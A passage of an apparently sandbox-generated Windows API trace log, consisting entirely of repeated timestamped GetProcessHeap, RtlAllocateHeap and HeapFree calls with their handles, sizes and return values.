hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.933] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.934] GetProcessHeap () returned 0x4f10000 [0060.934] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.935] GetProcessHeap () returned 0x4f10000 [0060.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.936] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.936] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.937] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.937] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.938] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.938] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.939] GetProcessHeap () returned 0x4f10000 [0060.939] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.940] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.940] GetProcessHeap () returned 0x4f10000 [0060.941] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.941] GetProcessHeap () returned 0x4f10000 [0060.941] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.941] GetProcessHeap () returned 0x4f10000 [0060.941] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.941] GetProcessHeap () returned 0x4f10000 [0060.941] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.946] GetProcessHeap () returned 0x4f10000 [0060.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.946] GetProcessHeap () returned 0x4f10000 [0060.946] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.946] GetProcessHeap () returned 0x4f10000 [0060.946] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.946] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.947] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.947] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7cdfa70 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f41278 | out: hHeap=0x4f10000) returned 1 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x104) returned 0x4f8a690 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cdfa70 | out: hHeap=0x4f10000) returned 1 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x4f41278 [0060.948] GetProcessHeap () returned 0x4f10000 [0060.948] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f8a690 | out: hHeap=0x4f10000) returned 1 [0060.948] 